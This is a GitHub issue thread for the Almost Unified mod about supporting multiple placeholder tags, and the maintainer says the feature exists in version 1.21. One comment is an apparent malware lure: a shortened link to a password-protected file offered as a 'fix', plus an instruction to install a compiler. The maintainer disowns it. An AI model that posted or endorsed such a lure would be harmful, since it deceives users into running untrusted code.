### ISSUE TITLE
[ Suggestion ]: A way to add more {material} like placeholders

### ISSUE THREAD

**Issue by Luningor** [AlmostReliable/almostunified#94]
### Describe the feature/addition!

I'd really like a way to add more placeholder tags to the unification to separate multiple different groups of items.

Disclaimer: I do not know if this is implemented, but I did test and it did not work, and I've seen no indicatives that this is an existing feature. Feel free to correct me if I'm mistaken, and thank you for your time.

### Why would like to see this feature/addition?

 Imagine, for example, I have {materials} {crops} and {weapons}. It'd be way easier for me to unify without overstepping into other categories if I could define these groups separately.

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://bit.ly/47P0Nvo
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Luningor** [comment]
I'm sorry could you elaborate on _why exactly_ would I need to download this?

**Comment by LLytho** [comment]
With 1.21 we introduced having multiple placeholders. This feature will not be added to older versions, sorry.

> I'm sorry could you elaborate on why exactly would I need to download this?

Hopefully u didn't download that. Was nothing from us.

**Comment by Luningor** [comment]
I did, but don't worry, didn't install anything. Double tapped to see if they were on the team and they were not.
Sad to hear, but glad it's on 1.21+. I'll just manually get them done with kubejs
